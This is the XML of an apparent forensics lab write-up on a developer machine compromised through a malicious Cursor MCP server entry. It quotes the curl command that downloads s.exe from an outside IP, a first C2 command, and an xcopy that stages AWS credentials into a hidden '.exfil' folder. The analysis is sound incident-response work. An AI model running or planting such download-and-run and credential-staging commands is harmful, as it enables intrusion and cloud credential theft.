                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chromium last_visit_time</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">13421192228031344</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114300" distR="114300">
            <wp:extent cx="5989320" cy="3007827"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="24" l="0" r="0" t="24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="300782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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 — Browser History database showing the malicious website and Chromium visit timestamp.</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3.2 Timestamp Conversion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The raw Chromium timestamp 13421192228031344 was entered into DCode. Selecting “Chromium Time Microseconds (UTC)” converted the value to 2026-04-20 20:57:08.031344Z. The lab answer was recorded to minute precision as 2026-04-20 20:57.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="3234467"/>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89320" cy="323446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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 — DCode conversion of the Chromium timestamp to 20 April 2026 at 20:57 UTC.</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Execution Through Cursor MCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 MCP Configuration Review</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The victim’s Cursor configuration file at C:\Users\Administrator\.cursor\mcp.json was opened. The mcpServers object defined an entry named “AWS dev ops.” Instead of launching a legitimate local MCP service, it invoked cmd.exe /c and executed a curl download-and-run chain.</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66">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration item</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Installed MCP server</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS dev ops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A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Interpreter</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cmd.exe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C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload URL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://3.72.63.40:80/payload/s.exe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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local output</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%TEMP%\s.exe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70">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution behavior</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Download payload, then start it in background</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drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="3015131"/>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89320" cy="301513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iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 — Cursor mcp.json showing the “AWS dev ops” server and embedded payload command.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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4.2 Endpoint Download Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: Sysmon process-creation events were reviewed in Event Log Explorer. An event mapped to MITRE ATT&amp;CK T1105 (Ingress Tool Transfer) showed curl.exe downloading the payload. The command line provides direct corroboration of the URL found in mcp.json and the destination path used on the endpoint.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78">
            <w:pPr>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79">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7A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1105 — Ingress Tool Transfer</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7C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Process</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\System32\curl.exe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7E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -s http://3.72.63.40:80/payload/s.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\s.exe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0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 20:58:11.267 UTC</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drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="4710539"/>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89320" cy="471053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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 — Sysmon event showing curl.exe downloading s.exe from attacker infrastructure.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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5. Command and Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 First Interactive Command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The next Sysmon process event was examined chronologically. It recorded cmd.exe executing /C pwd at 20:58:42 UTC, followed by execution of the downloaded s.exe. The pwd command is therefore the first observed command issued after the C2 session was established.</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89">
            <w:pPr>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8A">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B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">First command</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pwd</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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command line</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\system32\cmd.exe /C pwd</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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Working directory</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Users\Administrator\</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91">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload path</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sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Users\ADMINI~1\AppData\Local\Temp\s.exe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93">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp</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sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 20:58:42.563 UTC</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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="4699649"/>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89320" cy="469964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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 — Sysmon event showing the first observed C2 command, pwd, and execution of s.exe.</w:t>
      </w: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6. Credential Discovery and Collection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Targeted Cloud Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The post-exploitation sequence specifically accessed the .aws directory under the Administrator profile. This directory typically contains AWS CLI credential and configuration files. The evidence therefore identifies Amazon Web Services as the targeted cloud provider.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Credential Staging Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: Sysmon process events were filtered and reviewed after payload execution. A cmd.exe event at 21:03:07 UTC used xcopy to recursively copy the contents of C:\Users\Administrator\.aws into a newly created hidden staging directory named .exfil.</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9E">
            <w:pPr>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9F">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A0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Targeted credential directory</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Users\Administrator\.aws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A2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Staging directory</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Users\Administrator\.exfil\</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A4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">xcopy "C:\Users\Administrator\.aws\*" "C:\Users\Administrator\.exfil\" /E /I /H</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A6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
